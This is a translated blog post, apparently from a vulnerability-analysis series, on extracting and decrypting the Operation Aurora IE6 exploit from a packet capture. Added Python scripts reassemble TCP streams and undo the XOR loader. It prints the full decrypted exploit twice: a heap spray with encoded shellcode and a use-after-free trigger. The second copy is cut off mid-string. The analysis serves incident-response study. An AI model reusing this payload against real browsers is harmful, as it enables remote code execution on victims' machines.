
Operation Aurora Vulnerability Analysis: Extracting the Sample


Articles in this series
Operation Aurora Vulnerability Analysis 1: Extracting the Sample
Operation Aurora Vulnerability Analysis 2: Root Cause Analysis

1. Introduction to Operation Aurora

From Baidu Baike:
Operation Aurora (极光行动, also rendered 欧若拉行动) was a cyber attack in mid-December 2009 that possibly originated in China; the name "Aurora" comes from part of the path of a malicious file on an attacker's computer. Besides Google, more than 20 other companies were hit, including Adobe Systems, Juniper Networks, Rackspace, Yahoo, Symantec, Northrop Grumman and Dow Chemical. After the attack, Google announced a new plan: it would run a completely unfiltered search engine in China "within the bounds of the law", and admitted that if this proved impossible it might leave China and close its Chinese offices.

This is a classic vulnerability in IE 6.0. For whatever reason, analysis reports on it are surprisingly scarce; almost everything that can be found is a PoC showing how to exploit it. Out of curiosity about the root cause, I decided to analyse it in detail.

I did not actually know about this vulnerability at first. @老刘 sent me a packet capture, and that capture turned out to be exactly the scenario in which a victim running IE 6.0 visits a page crafted by the attacker and triggers the bug. So I started from zero, and here I record each step in turn: obtaining the capture, analysing it, extracting the sample, analysing the root cause and exploiting the vulnerability, as a record of the whole analysis workflow.


2. Analysing the packet capture

Since all we have is a capture, the capture is where we start. One caveat: this capture was made deliberately by someone, so it is fairly clean, containing only the traffic related to this vulnerability, which makes it comparatively easy to analyse. Packets captured in a real environment may be a jumble, and that is a real test of traffic-analysis skill. Our goal here is to analyse the vulnerability, so a simple pass over the traffic is enough.

2.1 Overview of the traffic

After opening the capture, you can see that it contains only two kinds of packets: HTTP and TCP.

/images/极光行动漏洞分析-提取样本/0365c5c767ee7650aa9955ebccc2428bd7cc26feda66d92cee0ae51b18bef4d5.png
Overview of the traffic

2.2 Checking the protocol hierarchy

The protocol hierarchy shows that TCP and HTTP account for most of the packets.

/images/极光行动漏洞分析-提取样本/836f6be306db58fa8675a1079b96bdaf763fd7441e42df79f3f2e2efe08cca9f.png
Protocol hierarchy

2.3 Checking the conversations

The Conversations window shows that there are only two conversations.

/images/极光行动漏洞分析-提取样本/ebd067b6dfdaed090f1c3bb82949264ebe5b5540e0fdb7e3d133df202a0c5513.png
Conversations

2.4 Filtering on a conversation

Apply a filter from the Conversations window.

/images/极光行动漏洞分析-提取样本/7a9bee420d53b9abe7bd5d07228b57c9adee3bd196ca43e3e0dd1c6223a0b3f1.png
Applying the filter

2.5 Following the stream

With the traffic filtered, choose Follow Stream to render the current traffic in a directly readable form. One thing to note: pick which stream to follow according to the protocol you filtered on. Here I filtered on TCP, so I follow the TCP stream; had the filter been on another protocol such as HTTP, you would follow the HTTP stream instead.

/images/极光行动漏洞分析-提取样本/ea00130973a220197e595c24e972608d7e64af5f7b3076ed0afe66fed2e30b2e.png
Follow TCP Stream

The filtered traffic contains two complete streams:

  • Stream 0:
    /images/极光行动漏洞分析-提取样本/a092e65e628b16f2883c154f7deca35bfd19367465719f246728eb9665ca2188.png
    Following stream 0
  • Stream 1:
    /images/极光行动漏洞分析-提取样本/abea4178b6ff5ec685c0f2f68c1e93b81a27b44da4f259b77a6d294be82f6491.png
    Following stream 1

Stream 0 is a web conversation, while stream 1 looks like commands being executed in a Windows command prompt.


3. Extracting the sample

Judging from the contents of the two streams, we can guess that the victim visited the attacker's web page, and that page then executed Windows commands (anyone attuned to attacks will spot this at a glance). The next step is to extract the attacker's sample and analyse it.

3.1 Analysing stream 0

Looking at stream 0, there is clearly only one page request, and that page is probably the attacker's malicious page.

/images/极光行动漏洞分析-提取样本/a306d9b94446ef8d5a56340a23cf65e3ddb73a04a790817830f90a6df857664b.png
Analysing stream 0

3.2 Extracting the sample

/images/极光行动漏洞分析-提取样本/f7f8df01fc7db4f3daeb66387fbf29991358bcfb11a7e4ef29fd69da5e625a58.png
Extracting the sample

The extracted page content looks like this:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
	// Stage 1 loader: the second stage is stored hex-encoded and XOR-encrypted
	var IwpVuiFqihVySoJStwXmT = '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';
	var RXb = '';
	// hex pairs -> characters
	for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
		RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i, i+2), 16));
	}
	// the key is the URL query string without the leading '?'
	var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
	var NqxAXnnXiILOBMwVnKoqnbp = '';
	// repeating-key XOR
	for (i=0;i<RXb.length;i++) {
		NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^ vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
	}
	// "eval".replace(/[A-Z]/g,"") is still "eval": this is window["eval"](decrypted)
	window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span>
</body>
</html>
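The same steps as sections 2 and 3, done without a GUI. The script below is an added example and not part of the original post: it reads a classic pcap file, groups packets into TCP conversations the way the Conversations window does, reassembles each direction in sequence-number order (Follow TCP Stream, including a retransmitted and an out-of-order segment) and pulls the HTTP response body and the request's query string out of the web stream. The capture it parses is constructed inline; the addresses, ports and page contents are hypothetical and only mirror the shape of the two streams above. It assumes IPv4/TCP over Ethernet and responses delimited by Content-Length.

```python
import struct
from collections import defaultdict

def _inet(addr):
    return bytes(int(x) for x in addr.split("."))

def build_frame(src, sport, dst, dport, seq, payload):
    """Ethernet + IPv4 + TCP (PSH/ACK) frame; checksums left at zero, the parser ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0, _inet(src), _inet(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp

def build_pcap(frames):
    """Classic libpcap file: 24-byte global header (link type 1 = Ethernet) and 16-byte record headers."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1260000000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)

def iter_frames(pcap):
    if struct.unpack("<I", pcap[:4])[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian classic pcap (pcapng and swapped magic not handled)")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack("<IIII", pcap[off:off + 16])[2]
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len

def parse_tcp(frame):
    """(src, sport, dst, dport, seq, payload) for IPv4/TCP over Ethernet, None for anything else."""
    if frame[12:14] != b"\x08\x00" or frame[14 + 9] != 6:
        return None
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    src, dst = ".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport, seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return src, sport, dst, dport, seq, tcp[(off_flags >> 12) * 4:]

def follow_tcp_streams(pcap):
    """One dict per conversation, in Wireshark's tcp.stream order: {(ip, port): reassembled bytes}."""
    keys, segments = [], []
    for frame in iter_frames(pcap):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, seq, payload = parsed
        key = frozenset([(src, sport), (dst, dport)])
        if key not in keys:
            keys.append(key)
            segments.append(defaultdict(list))
        if payload:
            segments[keys.index(key)][(src, sport)].append((seq, payload))
    streams = []
    for per_endpoint in segments:
        stream = {}
        for endpoint, parts in per_endpoint.items():
            buf, nxt = b"", None
            for seq, data in sorted(parts):              # sequence order, not capture order
                if nxt is not None and seq < nxt:        # retransmission or overlap: keep only new bytes
                    data, seq = data[nxt - seq:], nxt
                if data:
                    buf += data
                    nxt = seq + len(data)
            stream[endpoint] = buf
        streams.append(stream)
    return streams

def http_response_body(server_bytes):
    """Body of the first response, bounded by Content-Length (chunked encoding is not handled)."""
    head, _, body = server_bytes.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return body[:int(line.split(b":", 1)[1])]
    return body

# Constructed capture (hypothetical addresses, ports and contents) with the shape of the two streams
# in the post: stream 0 is the victim fetching the page with its query string, the response split in
# two segments that arrive out of order plus one retransmission; stream 1 looks like a command prompt.
VICTIM, ATTACKER = "192.168.56.101", "192.168.56.102"
PAGE = b"<html><head><script>/* constructed stand-in for the loader */</script></head></html>"
RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % len(PAGE) + PAGE
SAMPLE_PCAP = build_pcap([
    build_frame(VICTIM, 1035, ATTACKER, 80, 1, b"GET /index.html?rFfWELUjLJHpP HTTP/1.1\r\nHost: evil\r\n\r\n"),
    build_frame(ATTACKER, 80, VICTIM, 1035, 41, RESPONSE[40:]),   # second segment captured first
    build_frame(ATTACKER, 80, VICTIM, 1035, 1, RESPONSE[:40]),
    build_frame(ATTACKER, 80, VICTIM, 1035, 1, RESPONSE[:40]),    # retransmission
    build_frame(VICTIM, 1036, ATTACKER, 4444, 1, b"Microsoft Windows XP [Version 5.1.2600]\r\n\r\nC:\\>"),
    build_frame(ATTACKER, 4444, VICTIM, 1036, 1, b"whoami\r\n"),
])

def extract_page(pcap=SAMPLE_PCAP):
    """From stream 0: the request line, its query string (the loader's key) and the page body."""
    stream0 = follow_tcp_streams(pcap)[0]
    request = next(b for b in stream0.values() if b.startswith(b"GET "))
    response = next(b for b in stream0.values() if b.startswith(b"HTTP/"))
    request_line = request.split(b"\r\n", 1)[0].decode()
    return request_line, request_line.split(" ")[1].partition("?")[2], http_response_body(response)

if __name__ == "__main__":
    print(extract_page())
```

Reassembling by sequence number rather than capture order is what makes the extracted body byte-exact; the duplicated 40-byte segment in the constructed capture is dropped, as Follow TCP Stream does. For a real capture, `tshark -r capture.pcap --export-objects http,outdir` does the extraction in one command, but the script shows what that operation actually does.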

4. Verifying the sample

The sample above is a mass of obfuscated JavaScript. If you know JavaScript you can analyse the code directly. I am not very familiar with JavaScript, so I simply set up an environment and tested it with IE 6.0.

4.1 Setting up the environment

Set up a web server and put the malicious page in index.html to play the attacker.

/images/极光行动漏洞分析-提取样本/51a3d95841aba982cab2317cae5c66276bfd3f31c5180710e7830378d9ae5eff.png
Environment setup

4.2 Simulating the victim

Simulate the victim by visiting the malicious page with IE 6.0.

/images/极光行动漏洞分析-提取样本/1d17f07b9ed2a72fc607bc38150c15ae3430c70e655dc856c70268bfb7d19ad8.png
Visiting the malicious page

4.3 A quick look at the code

After visiting the malicious page in IE 6.0, nothing happened at all. My gut feeling was that the vulnerability had not been triggered and something was wrong. A quick look at the JavaScript gave the following:

/images/极光行动漏洞分析-提取样本/75202c56db00ddd9f66bba3db59f6db74861f5875f8459b98c02dbcdf509edcb.png
Code analysis

From this analysis we learn that the malicious script reads the query string of the URL being visited, so the vulnerability may only trigger when that parameter is supplied.

4.4 Finding the parameter

Look for the parameter in the stream followed earlier.

/images/极光行动漏洞分析-提取样本/72afc0d77b48a59ac804014305a165c91dab53630e1bf0fe37862fbae98eb795.png
Finding the parameter

Indeed, the malicious page was requested with a parameter: rFfWELUjLJHpP

4.5 Triggering the vulnerability

Visit the malicious page again with the parameter appended.

/images/极光行动漏洞分析-提取样本/04d86904dfc76119936fc9e300bfb2b25aa1d1dbddaca34bdb7ca7453a71fb64.png
Triggering the vulnerability

With the parameter added, visiting the extracted page crashes IE, which shows that this sample does trigger the vulnerability.


5. Decrypting the sample

From the above it is clear that the extracted page is an encrypted payload and the URL parameter is the decryption key, so the next step is to use the parameter to decrypt the payload.

How to decrypt it? My approach was to save the decrypted content to a file after the code is decrypted but before it is executed. It does not actually need to be that elaborate: simply printing the decrypted content would also work, but that is not what I did at the time. After modifying the malicious page it looks like this:

/images/极光行动漏洞分析-提取样本/1f52a2f7a4e2dacccd749f743c1d317afce35abf23762f5e05555486666f2ac3.png
Modified page

After the modification, visiting the page with the parameter yields the decrypted content.

/images/极光行动漏洞分析-提取样本/06673eaf4931b3c05074e8e49cc1c13fb1e9fa46bd1f1cce84595555619abeaf.png
Obtaining the decrypted sample
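The decryption can also be done offline, without IE or a modified page, by reimplementing the loader's two loops. The script below is an added example and not part of the original post; it serves sections 4.3 to 4.5 (why the page is inert without the query string) and section 5 (recovering the second stage with the key rFfWELUjLJHpP). Because the hex blob is not reproduced on this page, the sample HTML it parses is constructed by encrypting a stand-in script with the same scheme; the function and variable names are mine.

```python
import re
from urllib.parse import urlsplit

def key_from_request_line(request_line):
    """The loader uses location.search.substring(1): everything after '?' in the requested URL."""
    return urlsplit(request_line.split(" ")[1]).query

def extract_hex_blob(html):
    """The loader's first statement assigns the hex-encoded payload to a randomly named variable."""
    m = re.search(r"var\s+\w+\s*=\s*'([0-9a-fA-F]+)'\s*;", html)
    return m.group(1) if m else None

def decode_stage(hex_blob, key):
    """Mirror of the loader: hex pairs -> char codes, XOR with the repeating key; IE then eval()s the result."""
    raw = bytes.fromhex(hex_blob)
    if not key:
        # In JavaScript i % 0 is NaN and x ^ NaN === x, so with no query string the XOR is a no-op:
        # eval() receives the undecoded bytes and throws, which is why the page looked inert in 4.3.
        return raw.decode("latin-1")
    return bytes(b ^ ord(key[i % len(key)]) for i, b in enumerate(raw)).decode("latin-1")

def encode_stage(script, key):
    """Inverse of decode_stage (XOR is its own inverse); used here only to build the constructed sample."""
    return bytes(ord(c) ^ ord(key[i % len(key)]) for i, c in enumerate(script)).hex()

KEY = "rFfWELUjLJHpP"   # the query string recovered from the capture in 4.4
SAMPLE_SCRIPT = "var spray = []; /* constructed stand-in for the real second stage */"
SAMPLE_HTML = ("<script>\n\tvar IwpVuiFqihVySoJStwXmT = '%s';\n\tvar RXb = '';\n</script>"
               % encode_stage(SAMPLE_SCRIPT, KEY))   # constructed page, same layout as the loader

def recover_second_stage(html=SAMPLE_HTML, request_line="GET /index.html?" + KEY + " HTTP/1.1"):
    """Everything the analyst needs comes from the pcap: the page and the request line that fetched it."""
    return decode_stage(extract_hex_blob(html), key_from_request_line(request_line))

if __name__ == "__main__":
    print(recover_second_stage())
```

The key never appears in the page itself, only in the request URL, so a sample pulled from a web proxy log or an exported HTTP object without its request line cannot be decrypted; the request line has to be kept together with the page.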

The decrypted payload is as follows:

/images/极光行动漏洞分析-提取样本/948001d3207b7dc788672a086ae0726f50cc93e1d8ff6d690498a89981935c6b.png
Decrypted payload

Beautifying it gives the decrypted JavaScript:

var VwUaVFlsiaztYmICdYI = "COMMENT";
// 1300 comment nodes; their .data strings are rewritten later to reclaim freed memory
var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
for (i = 0; i < 1300; i++) {
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
}
var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;	// copy of the iframe's onload event, kept after the iframe is gone
var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();	// heap-spray blocks
var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;	// alias for unescape()

// Heap spray: %u-encoded shellcode behind a large 0x0c0d0c0d slide, 150 copies
function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX() {
	var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd
%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
	// 0x0c0d repeated by doubling until the string exceeds 0xd0000 characters
	var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
	do {
		uafwHGfWUmxkIam += uafwHGfWUmxkIam
	} while (uafwHGfWUmxkIam.length < 0xd0000);
	// 150 blocks of slide + shellcode
	for (S = 0; S < 150; S++) JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
}

// onload handler of the iframe inside the <span> in the body
function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz) {
	gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
	// copy the event; the copy still refers to the iframe as its srcElement
	lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
	// clearing the span destroys the iframe, but the saved event keeps pointing at it
	document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
	// every 50 ms: refill the freed memory, then touch the dangling reference
	window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
}

function nayjNuSncnxGnhZDJrEXatSDkpo() {
	// pattern written into every comment node, aiming to land where the iframe object used to be
	p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
	for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++) {
		MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
	}
	// use of the destroyed element through the saved event: this is what crashed IE in 4.5
	var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
}

Delete the original undecrypted code, replace it with the decrypted code, and visit the page again: it still works:

/images/极光行动漏洞分析-提取样本/5b45629c75be300fc6f26cc520891190c4152c1295fd076e9e09be0121136ec0.png

The final complete payload:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var VwUaVFlsiaztYmICdYI = "COMMENT";
var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
for (i = 0; i < 1300; i++) {
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
}
var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;

function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX() {
	var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd
%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c